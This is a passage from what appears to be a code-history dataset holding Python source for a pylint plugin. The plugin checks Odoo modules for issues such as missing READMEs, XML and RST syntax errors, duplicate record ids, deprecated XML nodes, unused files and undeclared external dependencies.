@name='user_id']\")\n if ir_filter_fields and len(ir_filter_fields) == 1:\n self.msg_args = '%s:%d' % (xml_file, ir_filter_record.\n sourceline), 
ir_filter_record.get('id')\n return False\n return True\n\n @staticmethod\n def _get_priority(view):\n try:\n priority_node = view.xpath(\"field[@name='priority'][1]\")[0]\n return int(priority_node.get('eval', priority_node.text) or 0)\n except (IndexError, ValueError):\n pass\n return 0\n\n @staticmethod\n def _is_replaced_field(view):\n try:\n arch = view.xpath(\"field[@name='arch' and @type='xml'][1]\")[0]\n except IndexError:\n return None\n replaces = arch.xpath(\n \".//field[@name='name' and @position='replace'][1]\") + arch.xpath(\n \".//xpath[@position='replace'][1]\")\n return bool(replaces)\n\n def _check_dangerous_view_replace_wo_priority(self):\n \"\"\"Check dangerous view defined with low priority\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n views = self.get_xml_records(os.path.join(self.module_path,\n xml_file), model='ir.ui.view')\n for view in views:\n priority = self._get_priority(view)\n is_replaced_field = self._is_replaced_field(view)\n if is_replaced_field and priority < self.config.min_priority:\n self.msg_args.append(('%s:%s' % (xml_file, view.\n sourceline), priority, self.config.min_priority))\n if self.msg_args:\n return False\n return True\n\n def _check_create_user_wo_reset_password(self):\n \"\"\"Check xml records of user without the context\n 'context=\"{'no_reset_password': True}\"'\n This context avoid send email and mail log warning\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n user_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='res.users')\n self.msg_args.extend([('%s:%s' % (xml_file, user_record.\n sourceline)) for user_record in user_records if user_record\n .xpath(\"field[@name='name']\") and 'no_reset_password' not in\n 
(user_record.get('context') or '')])\n if self.msg_args:\n return False\n return True\n\n def _check_javascript_lint(self):\n \"\"\"Check javascript lint\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for js_file_rel in self.filter_files_ext('js', relpath=True):\n js_file = os.path.join(self.module_path, js_file_rel)\n errors = self.check_js_lint(js_file, self.config.jslintrc)\n for error in errors:\n self.msg_args.append((js_file_rel + error,))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_data_xml_node(self):\n \"\"\"Check deprecated <data> xml node inside <odoo> xml node\n :return: False if found <data> xml node inside <odoo> xml node\"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n odoo_nodes = doc.xpath('/odoo') if not isinstance(doc, string_types\n ) else []\n children, data_node = (odoo_nodes[0].getchildren(), odoo_nodes[\n 0].findall('data')) if odoo_nodes else ([], [])\n if len(children) == 1 and len(data_node) == 1:\n lineno = odoo_nodes[0].sourceline\n self.msg_args.append('%s:%s' % (xml_file, lineno))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_openerp_xml_node(self):\n \"\"\"Check deprecated <openerp> xml node\n :return: False if exists <openerp> node and\n add list of xml files in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n openerp_nodes = doc.xpath('/openerp') if not isinstance(doc,\n string_types) else []\n if openerp_nodes:\n lineno = openerp_nodes[0].sourceline\n self.msg_args.append('%s:%s' % (xml_file, lineno))\n if self.msg_args:\n return False\n return True\n\n def _check_wrong_tabs_instead_of_spaces(self):\n \"\"\"Check wrong tabs character instead of four spaces.\n 
:return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n countline = 0\n with open(ext_file, 'rb') as fp:\n for line in fp:\n countline += 1\n line_space_trip = line.lstrip(b' ')\n if line_space_trip != line_space_trip.lstrip(b'\\t'):\n self.msg_args.append('%s:%d' % (ext_file_rel,\n countline))\n if self.msg_args:\n return False\n return True\n\n def _check_missing_newline_extrafiles(self):\n \"\"\"Check missing newline in other ext files (.xml, .csv, .po)\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n last_line = ''\n with open(ext_file, 'rb') as fp:\n if os.stat(ext_file).st_size > 1:\n fp.seek(-2, os.SEEK_END)\n last_line = fp.readline()\n if not (last_line.endswith(b'\\n') or last_line.\n endswith(b'\\r')):\n self.msg_args.append((ext_file_rel,))\n if self.msg_args:\n return False\n return True\n\n def _get_manifest_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n referenced_files[fname] = data_type\n return referenced_files\n\n def _get_xml_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n if not fname.endswith('.xml'):\n continue\n referenced_files.update(self.\n _get_xml_referenced_files_report(fname, data_type))\n return referenced_files\n\n def _get_xml_referenced_files_report(self, fname, data_type):\n return {os.path.join(*record.attrib[attribute].split(os.sep)[1:]):\n data_type for attribute in 
['xml', 'xsl'] for record in self.\n parse_xml(os.path.join(self.module_path, fname)).xpath(\n '//report[@%s]' % attribute)}\n\n def _get_module_files(self):\n module_files = []\n for type_file in self.config.extfiles_convert:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n module_files.append(ext_file_rel)\n return module_files\n\n def _check_file_not_used(self):\n \"\"\"Check if a file is not used from manifest\"\"\"\n module_files = set(self._get_module_files())\n referenced_files = set(self._get_manifest_referenced_files()).union(set\n (self._get_xml_referenced_files()))\n excluded_dirs = ['static', 'test', 'tests', 'migrations']\n no_referenced_files = [f for f in module_files - referenced_files if\n f.split(os.path.sep)[0] not in excluded_dirs]\n self.msg_args = no_referenced_files\n return not no_referenced_files\n\n def _check_xml_attribute_translatable(self):\n \"\"\"The xml attribute is missing the translation=\"off\" tag\n Example <attribute name=\"groups\">sale.group</attribute>\n \"\"\"\n if self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions != ['8.0']:\n return True\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), None,\n '//attribute[not(@name=\"string\") and not(@translation)]'):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), 'xml_id'))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_tree_attribute(self):\n \"\"\"The tree-view declaration is using a deprecated attribute.\n Example <tree string=\"Partners\"></tree>\n \"\"\"\n checks = [{'attr': 'colors', 'skip_versions': {'4.2', '5.0', '6.0',\n '6.1', '7.0', '8.0'}, 'xpath': './/tree[@colors]'}, {'attr':\n 'fonts', 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0',\n '8.0'}, 'xpath': './/tree[@fonts]'}, {'attr': 'string',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'}, 
'xpath':\n './/tree[@string]'}]\n valid_versions = set(self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions)\n applicable_checks = [check for check in checks if check['attr'] in\n self.config.deprecated_tree_attributes and bool(valid_versions -\n check['skip_versions'])]\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.ui.view'):\n for check in applicable_checks:\n if record.xpath(check['xpath']):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), check['attr']))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_qweb_directive(self):\n \"\"\"Check for use of deprecated QWeb directives t-*-options.\n :return: False if deprecated directives are found, in which case\n self.msg_args will contain the error messages.\n \"\"\"\n valid_versions = set(self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions)\n if not valid_versions & {'10.0', '11.0'}:\n return True\n deprecated_directives = {'t-esc-options', 't-field-options',\n 't-raw-options'}\n directive_attrs = '|'.join('@%s' % d for d in deprecated_directives)\n xpath = '|'.join('/%s//template//*[%s]' % (tag, directive_attrs) for\n tag in ('odoo', 'openerp'))\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=False):\n doc = self.parse_xml(xml_file)\n if isinstance(doc, string_types):\n continue\n for node in doc.xpath(xpath):\n directive = next(iter(set(node.attrib) & deprecated_directives)\n )\n self.msg_args.append(('%s:%d' % (xml_file, node.sourceline),\n directive))\n return not bool(self.msg_args)\n",
"step-5": "\"\"\"Visit module to add odoo checks\n\"\"\"\n\nimport os\nimport re\n\nimport astroid\nimport isort\nfrom pylint.checkers import utils\nfrom six import string_types\n\nfrom .. import misc, settings\n\nODOO_MSGS = {\n # C->convention R->refactor W->warning E->error F->fatal\n\n # Visit odoo module with settings.BASE_OMODULE_ID\n 'C%d02' % settings.BASE_OMODULE_ID: (\n 'Missing ./README.rst file. Template here: %s',\n 'missing-readme',\n settings.DESC_DFLT\n ),\n 'E%d01' % settings.BASE_OMODULE_ID: (\n '%s %s',\n 'rst-syntax-error',\n settings.DESC_DFLT\n ),\n 'E%d02' % settings.BASE_OMODULE_ID: (\n '%s error: %s',\n 'xml-syntax-error',\n settings.DESC_DFLT\n ),\n 'W%d01' % settings.BASE_OMODULE_ID: (\n '%s Dangerous filter without explicit `user_id` in xml_id %s',\n 'dangerous-filter-wo-user',\n settings.DESC_DFLT\n ),\n 'W%d02' % settings.BASE_OMODULE_ID: (\n '%s Duplicate xml record id \"%s\" in %s',\n 'duplicate-xml-record-id',\n settings.DESC_DFLT\n ),\n 'W%d03' % settings.BASE_OMODULE_ID: (\n '%s',\n 'javascript-lint',\n settings.DESC_DFLT\n ),\n 'W%d04' % settings.BASE_OMODULE_ID: (\n '%s Deprecated <openerp> xml node',\n 'deprecated-openerp-xml-node',\n settings.DESC_DFLT\n ),\n 'W%d05' % settings.BASE_OMODULE_ID: (\n '%s record res.users without '\n 'context=\"{\\'no_reset_password\\': True}\"',\n 'create-user-wo-reset-password',\n settings.DESC_DFLT\n ),\n 'W%d06' % settings.BASE_OMODULE_ID: (\n '%s Duplicate id \"%s\"',\n 'duplicate-id-csv',\n settings.DESC_DFLT\n ),\n 'W%d07' % settings.BASE_OMODULE_ID: (\n '%s Duplicate xml field \"%s\" in lines %s',\n 'duplicate-xml-fields',\n settings.DESC_DFLT\n ),\n 'W%d08' % settings.BASE_OMODULE_ID: (\n '%s Missing newline',\n 'missing-newline-extrafiles',\n settings.DESC_DFLT\n ),\n 'W%d09' % settings.BASE_OMODULE_ID: (\n '%s Redundant name module reference in xml_ids \"%s\".',\n 'redundant-modulename-xml',\n settings.DESC_DFLT\n ),\n 'W%d10' % settings.BASE_OMODULE_ID: (\n '%s Use wrong tabs 
indentation instead of four spaces',\n 'wrong-tabs-instead-of-spaces',\n settings.DESC_DFLT\n ),\n 'R%d80' % settings.BASE_OMODULE_ID: (\n 'Consider merging classes inherited to \"%s\" from %s.',\n 'consider-merging-classes-inherited',\n settings.DESC_DFLT\n ),\n 'W%d50' % settings.BASE_OMODULE_ID: (\n 'Same Odoo module absolute import. You should use '\n 'relative import with \".\" '\n 'instead of \"openerp.addons.%s\"',\n 'odoo-addons-relative-import',\n settings.DESC_DFLT\n ),\n 'W%d40' % settings.BASE_OMODULE_ID: (\n '%s Dangerous use of \"replace\" from view '\n 'with priority %s < %s. '\n 'Increase priority or don\\'t use \"replace\". '\n 'For more information see https://odoo-development.readthedocs.io/en/latest/dev/xml/inherit.html#collisions-and-priority ',\n 'dangerous-view-replace-wo-priority',\n settings.DESC_DFLT\n ),\n 'W%d30' % settings.BASE_OMODULE_ID: (\n '%s not used from manifest',\n 'file-not-used',\n settings.DESC_DFLT\n ),\n 'W%d35' % settings.BASE_OMODULE_ID: (\n 'External dependency \"%s\" without ImportError. More info: '\n 'https://odoo-development.readthedocs.io/en/latest/dev/py/external-imports.html'\n '#external-dependencies',\n 'missing-import-error',\n settings.DESC_DFLT\n ),\n 'W%d36' % settings.BASE_OMODULE_ID: (\n 'Missing external dependency \"%s\" from manifest. More info: '\n 'https://github.com/OCA/odoo-community.org/blob/master/website/'\n 'Contribution/CONTRIBUTING.rst'\n '#external-dependencies',\n 'missing-manifest-dependency',\n settings.DESC_DFLT\n ),\n 'W%d38' % settings.BASE_OMODULE_ID: (\n 'pass into block except. 
'\n 'If you really need to use the pass consider logging that exception',\n 'except-pass',\n settings.DESC_DFLT\n ),\n 'W%d37' % settings.BASE_OMODULE_ID: (\n '%s The xml attribute is missing the translation=\"off\" tag %s',\n 'xml-attribute-translatable',\n settings.DESC_DFLT\n ),\n 'W%d42' % settings.BASE_OMODULE_ID: (\n '%s Deprecated <tree> xml attribute \"%s\"',\n 'xml-deprecated-tree-attribute',\n settings.DESC_DFLT\n ),\n 'W%d43' % settings.BASE_OMODULE_ID: (\n '%s Deprecated QWeb directive \"%s\". Use \"t-options\" instead',\n 'xml-deprecated-qweb-directive',\n settings.DESC_DFLT\n ),\n 'W%d39' % settings.BASE_OMODULE_ID: (\n '%s Use <odoo> instead of <odoo><data> or use <odoo noupdate=\"1\">'\n 'instead of <odoo><data noupdate=\"1\">',\n 'deprecated-data-xml-node',\n settings.DESC_DFLT\n ),\n 'W%d44' % settings.BASE_OMODULE_ID: (\n '%s The resource in in src/href contains a not valid chararter',\n 'character-not-valid-in-resource-link',\n settings.DESC_DFLT\n ),\n}\n\n\nDFTL_README_TMPL_URL = 'https://github.com/OCA/maintainer-tools' + \\\n '/blob/master/template/module/README.rst'\nDFTL_README_FILES = ['README.rst', 'README.md', 'README.txt']\nDFTL_MIN_PRIORITY = 99\n# Files supported from manifest to convert\n# Extracted from openerp/tools/convert.py:def convert_file\nDFLT_EXTFILES_CONVERT = ['csv', 'sql', 'xml', 'yml']\nDFLT_EXTFILES_TO_LINT = DFLT_EXTFILES_CONVERT + [\n 'po', 'js', 'mako', 'rst', 'md', 'markdown']\nDFLT_IMPORT_NAME_WHITELIST = [\n # self-odoo\n 'odoo', 'openerp',\n # packages for unit tests only\n 'requests_mock',\n # Known external packages of odoo\n 'PIL', 'anybox.testing.openerp', 'argparse', 'babel',\n 'dateutil', 'decorator', 'docutils', 'faces', 'feedparser',\n 'gdata', 'gevent', 'greenlet', 'jcconv', 'jinja2',\n 'ldap', 'lxml', 'mako', 'markupsafe', 'mock', 'odf',\n 'ofxparse', 'openid', 'passlib', 'pkg_resources',\n 'psutil', 'psycogreen', 'psycopg2', 'pyPdf', 'pychart',\n 'pydot', 'pyparsing', 'pytz', 'qrcode', 'reportlab',\n 
'requests', 'serial', 'simplejson', 'six', 'suds',\n 'unittest2', 'usb', 'vatnumber', 'vobject', 'werkzeug',\n 'wsgiref', 'xlsxwriter', 'xlwt', 'yaml',\n]\nDFTL_JSLINTRC = os.path.join(\n os.path.dirname(os.path.dirname(os.path.realpath(__file__))),\n 'examples', '.jslintrc'\n)\nDFLT_DEPRECATED_TREE_ATTRS = ['colors', 'fonts', 'string']\nDFTL_MANIFEST_DATA_KEYS = ['data', 'demo', 'demo_xml', 'init_xml', 'test',\n 'update_xml']\n\n\nclass ModuleChecker(misc.WrapperModuleChecker):\n name = settings.CFG_SECTION\n msgs = ODOO_MSGS\n options = (\n ('readme_template_url', {\n 'type': 'string',\n 'metavar': '<string>',\n 'default': DFTL_README_TMPL_URL,\n 'help': 'URL of README.rst template file',\n }),\n ('extfiles_to_lint', {\n 'type': 'csv',\n 'metavar': '<comma separated values>',\n 'default': DFLT_EXTFILES_TO_LINT,\n 'help': 'List of extension files to check separated by a comma.'\n }),\n ('min-priority', {\n 'type': 'int',\n 'metavar': '<int>',\n 'default': DFTL_MIN_PRIORITY,\n 'help': 'Minimum priority number of a view with replace of fields.'\n }),\n ('extfiles_convert', {\n 'type': 'csv',\n 'metavar': '<comma separated values>',\n 'default': DFLT_EXTFILES_CONVERT,\n 'help': 'List of extension files supported to convert '\n 'from manifest separated by a comma.'\n }),\n ('import_name_whitelist', {\n 'type': 'csv',\n 'metavar': '<comma separated values>',\n 'default': DFLT_IMPORT_NAME_WHITELIST,\n 'help': 'List of known import dependencies of odoo,'\n ' separated by a comma.'\n }),\n ('jslintrc', {\n 'type': 'string',\n 'metavar': '<path to file>',\n 'default': os.environ.get('PYLINT_ODOO_JSLINTRC') or DFTL_JSLINTRC,\n 'help': ('A path to a file that contains a configuration file of '\n 'javascript lint. You can use the environment variable '\n '\"PYLINT_ODOO_JSLINTRC\" too. 
Default: %s' % DFTL_JSLINTRC)\n }),\n ('deprecated_tree_attributes', {\n 'type': 'multiple_choice',\n 'metavar': '<attributes>',\n 'default': DFLT_DEPRECATED_TREE_ATTRS,\n 'choices': DFLT_DEPRECATED_TREE_ATTRS,\n 'help': 'List of deprecated list view attributes,'\n ' separated by a comma. Valid values: %s' % ', '.join(\n DFLT_DEPRECATED_TREE_ATTRS)\n }),\n )\n\n odoo_check_versions = {\n 'missing-import-error': {\n 'max_odoo_version': '11.0',\n },\n }\n\n class_inherit_names = []\n\n @utils.check_messages('consider-merging-classes-inherited')\n def visit_assign(self, node):\n if not self.odoo_node:\n return\n if not self.linter.is_message_enabled(\n 'consider-merging-classes-inherited', node.lineno):\n return\n node_left = node.targets[0]\n if not isinstance(node_left, astroid.node_classes.AssignName) or \\\n node_left.name not in ('_inherit', '_name') or \\\n not isinstance(node.value, astroid.node_classes.Const) or \\\n not isinstance(node.parent, astroid.ClassDef):\n return\n if node_left.name == '_name':\n node.parent.odoo_attribute_name = node.value.value\n return\n _name = getattr(node.parent, 'odoo_attribute_name', None)\n _inherit = node.value.value\n if _name and _name != _inherit:\n # Skip _name='model.name' _inherit='other.model' because is valid\n return\n key = (self.odoo_node, _inherit)\n node.file = self.linter.current_file\n self.inh_dup.setdefault(key, []).append(node)\n\n def _build_whitelist_module_patterns(self):\n known_patterns = []\n for known_pattern in self.config.import_name_whitelist:\n pattern = known_pattern.replace('*', '.*').replace('?', '.?')\n known_patterns.append(re.compile('^' + pattern + '$'))\n return known_patterns\n\n def open(self):\n \"\"\"Define variables to use cache\"\"\"\n self.inh_dup = {}\n patterns = self._build_whitelist_module_patterns()\n self._whitelist_module_patterns = patterns\n super(ModuleChecker, self).open()\n\n def close(self):\n \"\"\"Final process get all cached values and add messages\"\"\"\n for 
(odoo_node, class_dup_name), nodes in self.inh_dup.items():\n if len(nodes) == 1:\n continue\n path_nodes = []\n for node in nodes[1:]:\n relpath = os.path.relpath(node.file,\n os.path.dirname(odoo_node.file))\n path_nodes.append(\"%s:%d\" % (relpath, node.lineno))\n self.add_message('consider-merging-classes-inherited',\n node=nodes[0],\n args=(class_dup_name, ', '.join(path_nodes)))\n\n def _get_odoo_module_imported(self, node):\n odoo_module = []\n if isinstance(node, astroid.ImportFrom) and \\\n ('openerp.addons' in node.modname or\n 'odoo.addons' in node.modname):\n packages = node.modname.split('.')\n if len(packages) >= 3:\n # from openerp.addons.odoo_module import models\n odoo_module.append(packages[2])\n else:\n # from openerp.addons import odoo_module\n odoo_module.append(node.names[0][0])\n elif isinstance(node, astroid.Import):\n for name, _ in node.names:\n if 'openerp.addons' not in name and 'odoo.addons' not in name:\n continue\n packages = name.split('.')\n if len(packages) >= 3:\n # import openerp.addons.odoo_module\n odoo_module.append(packages[2])\n return odoo_module\n\n def check_odoo_relative_import(self, node):\n if self.odoo_module_name in self._get_odoo_module_imported(node):\n self.add_message('odoo-addons-relative-import', node=node,\n args=(self.odoo_module_name))\n\n @staticmethod\n def _is_absolute_import(node, name):\n modnode = node.root()\n importedmodnode = ModuleChecker._get_imported_module(node, name)\n if importedmodnode and importedmodnode.file and \\\n modnode is not importedmodnode and \\\n importedmodnode.name != name:\n return True\n return False\n\n @staticmethod\n def _get_imported_module(importnode, modname):\n try:\n return importnode.do_import_module(modname)\n except:\n pass\n\n def _is_module_name_in_whitelist(self, module_name):\n # Try to find most specific placement instruction match (if any)\n # (from isort place_module() method)\n parts = module_name.split('.')\n module_names_to_check = [\n 
'.'.join(parts[:first_k])\n for first_k in range(len(parts), 0, -1)\n ]\n # Check if one of the module name is part of the whitelist.\n # For an module name such as 'anybox.testing.openerp', the\n # modules names to check will be:\n # ['anybox.testing.openerp', 'anybox.testing', 'anybox']\n # Only one of them has to be in the whitelist to be accepted.\n for module_name_to_check in module_names_to_check:\n for pattern in self._whitelist_module_patterns:\n if pattern.match(module_name_to_check):\n return True\n return False\n\n def _check_imported_packages(self, node, module_name):\n \"\"\"Check if the import node is a external dependency to validate it\"\"\"\n if not module_name:\n # skip local packages because is not a external dependency.\n return\n if not self.manifest_dict:\n # skip if is not a module of odoo\n return\n if not isinstance(node.parent, astroid.Module):\n # skip nested import sentences\n return\n if self._is_absolute_import(node, module_name):\n # skip absolute imports\n return\n if self._is_module_name_in_whitelist(module_name):\n # ignore whitelisted modules\n return\n isort_obj = isort.SortImports(file_contents='')\n import_category = isort_obj.place_module(module_name)\n if import_category not in ('FIRSTPARTY', 'THIRDPARTY'):\n # skip if is not a external library or is a white list library\n return\n relpath = os.path.relpath(\n node.parent.file, os.path.dirname(self.manifest_file))\n if os.path.dirname(relpath) == 'tests':\n # import errors rules don't apply to the test files\n # since these files are loaded only when running tests\n # and in such a case your\n # module and their external dependencies are installed.\n return\n self.add_message('missing-import-error', node=node,\n args=(module_name,))\n\n ext_deps = self.manifest_dict.get('external_dependencies') or {}\n py_ext_deps = ext_deps.get('python') or []\n if isinstance(node, astroid.ImportFrom) and (node.level or 0) >= 1:\n return\n if module_name not in py_ext_deps and \\\n 
module_name.split('.')[0] not in py_ext_deps:\n self.add_message('missing-manifest-dependency', node=node,\n args=(module_name,))\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error',\n 'missing-manifest-dependency')\n def visit_importfrom(self, node):\n self.check_odoo_relative_import(node)\n if isinstance(node.scope(), astroid.Module):\n package = node.modname\n self._check_imported_packages(node, package)\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error',\n 'missing-manifest-dependency')\n def visit_import(self, node):\n self.check_odoo_relative_import(node)\n for name, _ in node.names:\n if isinstance(node.scope(), astroid.Module):\n self._check_imported_packages(node, name)\n\n @utils.check_messages('except-pass')\n def visit_tryexcept(self, node):\n \"\"\"Visit block try except\"\"\"\n for handler in node.handlers:\n if (not handler.name and\n len(handler.body) == 1 and\n isinstance(handler.body[0], astroid.node_classes.Pass)):\n self.add_message('except-pass', node=handler)\n\n def _check_rst_syntax_error(self):\n \"\"\"Check if rst file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n rst_files = self.filter_files_ext('rst')\n self.msg_args = []\n for rst_file in rst_files:\n errors = self.check_rst_syntax(\n os.path.join(self.module_path, rst_file))\n for error in errors:\n msg = error.full_message\n res = re.search(\n r'No directive entry for \"([\\w|\\-]+)\"|'\n r'Unknown directive type \"([\\w|\\-]+)\"|'\n r'No role entry for \"([\\w|\\-]+)\"|'\n r'Unknown interpreted text role \"([\\w|\\-]+)\"', msg)\n # TODO: Add support for sphinx directives after fix\n # https://github.com/twolfson/restructuredtext-lint/issues/29\n if res:\n # Skip directive errors\n continue\n self.msg_args.append((\n \"%s:%d\" % (rst_file, error.line or 0),\n msg.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def 
_check_missing_readme(self):\n \"\"\"Check if exists ./README.{rst,md,txt} file\n :return: If exists return True else False\n \"\"\"\n self.msg_args = (self.config.readme_template_url,)\n for readme in DFTL_README_FILES:\n if os.path.isfile(os.path.join(self.module_path, readme)):\n return True\n return False\n\n def _check_xml_syntax_error(self):\n \"\"\"Check if xml file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n result = self.parse_xml(os.path.join(self.module_path, xml_file))\n if isinstance(result, string_types):\n self.msg_args.append((\n xml_file, result.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_record_id(self, records):\n \"\"\"Get duplicated records based on attribute id\n :param records list: List of lxml.etree.Element \"<record\"\n :return: Duplicated items.\n e.g. 
{record.id: [record_node1, record_node2]}\n :rtype: dict\n \"\"\"\n all_records = {}\n for record in records:\n record_id = \"%s/%s_noupdate_%s\" % (\n record.attrib.get('section', ''),\n record.attrib.get('id', ''),\n record.getparent().attrib.get('noupdate', '0'),\n )\n all_records.setdefault(record_id, []).append(record)\n # Remove all keys which not duplicated\n records = {}\n for key, items in all_records.items():\n if not len(items) < 2:\n records[key] = items\n return records\n\n def _check_duplicate_xml_record_id(self):\n \"\"\"Check duplicated XML-IDs inside of the files of\n each manifest-section treated them separately\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_records = []\n for fname, section in self._get_manifest_referenced_files().items():\n if os.path.splitext(fname)[1].lower() != '.xml':\n continue\n fname = os.path.join(self.module_path, fname)\n for xml_record in self.get_xml_records(fname):\n xml_record.attrib['section'] = section\n xml_records.append(xml_record)\n for name, fobjs in \\\n self._get_duplicate_xml_record_id(xml_records).items():\n self.msg_args.append((\n \"%s:%d\" % (os.path.relpath(fobjs[0].base, self.module_path),\n fobjs[0].sourceline),\n name,\n ', '.join([os.path.relpath(fobj.base, self.module_path) +\n ':' + str(fobj.sourceline)\n for fobj in fobjs[1:]]),\n ))\n if self.msg_args:\n return False\n return True\n\n def _check_duplicate_id_csv(self):\n \"\"\"Check duplicate xml id in ir.model.access.csv files of a odoo module.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n all_csv_ids = []\n self.msg_args = []\n for csv_file_rel in self.filter_files_ext('csv', relpath=True):\n csv_file = os.path.join(self.module_path, csv_file_rel)\n if os.path.basename(csv_file) == 'ir.model.access.csv':\n all_csv_ids.extend(self.get_field_csv(csv_file))\n duplicated_ids_csv = self.get_duplicated_items(all_csv_ids)\n for 
duplicated_id_csv in duplicated_ids_csv:\n self.msg_args.append((csv_file_rel, duplicated_id_csv))\n if duplicated_ids_csv:\n return False\n return True\n\n def _check_redundant_modulename_xml(self):\n \"\"\"Check redundant module name in xml file.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file_rel in self.filter_files_ext('xml', relpath=True):\n xml_file = os.path.join(self.module_path, xml_file_rel)\n for xml_id, lineno in self.get_xml_redundant_module_name(\n xml_file, self.module):\n self.msg_args.append(\n (\"%s:%d\" % (xml_file_rel, lineno), xml_id))\n if self.msg_args:\n return False\n return True\n\n def _check_character_not_valid_in_resource_link(self):\n \"\"\"The resource in in src/href contains a not valid chararter\"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml'):\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n for name, attr in (('link', 'href'), ('script', 'src')):\n nodes = (doc.xpath('.//%s[@%s]' % (name, attr))\n if not isinstance(doc, string_types) else [])\n for node in nodes:\n resource = node.get(attr, '')\n ext = os.path.splitext(os.path.basename(resource))[1]\n if (resource.startswith('/') and not\n re.search('^[.][a-zA-Z]+$', ext)):\n self.msg_args.append((\"%s:%s\" % (xml_file,\n node.sourceline)))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_fields(self, fields):\n \"\"\"Get duplicated xml fields based on attribute name\n :param fields list: List of lxml.etree.Element \"<field\"\n :return: Duplicated items.\n e.g. 
{field.name: [field_node1, field_node2]}\n :rtype: dict\n \"\"\"\n all_fields = {}\n for field in fields:\n field_xml = field.attrib.get('name')\n if not field_xml:\n continue\n all_fields.setdefault(\n (field_xml, field.attrib.get('context'),\n field.attrib.get('filter_domain'),\n field.getparent()), []).append(field)\n # Remove all keys which not duplicated by excluding them from the\n return dict(((name, context, filter_domain, parent_node), nodes) for\n (name, context, filter_domain, parent_node), nodes in\n all_fields.items() if len(nodes) >= 2)\n\n def _check_duplicate_xml_fields(self):\n \"\"\"Check duplicate field in all record of xml files of a odoo module.\n Important note: this check does not work with inherited views.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(\n os.path.join(self.module_path, xml_file)):\n if record.xpath('field[@name=\"inherit_id\"]'):\n continue\n for xpath in ['field', 'field/*/field',\n 'field/*/field/tree/field',\n 'field/*/field/form/field']:\n for name, fobjs in self._get_duplicate_xml_fields(\n record.xpath(xpath)).items():\n self.msg_args.append((\n \"%s:%d\" % (xml_file, fobjs[0].sourceline), name[0],\n ', '.join([str(fobj.sourceline)\n for fobj in fobjs[1:]]),\n ))\n if self.msg_args:\n return False\n return True\n\n def _check_dangerous_filter_wo_user(self):\n \"\"\"Check dangerous filter without a user assigned.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n ir_filter_records = self.get_xml_records(\n os.path.join(self.module_path, xml_file), model='ir.filters')\n for ir_filter_record in ir_filter_records:\n ir_filter_fields = ir_filter_record.xpath(\n \"field[@name='name' or @name='user_id']\")\n # if exists field=\"name\" then is a new record\n # then 
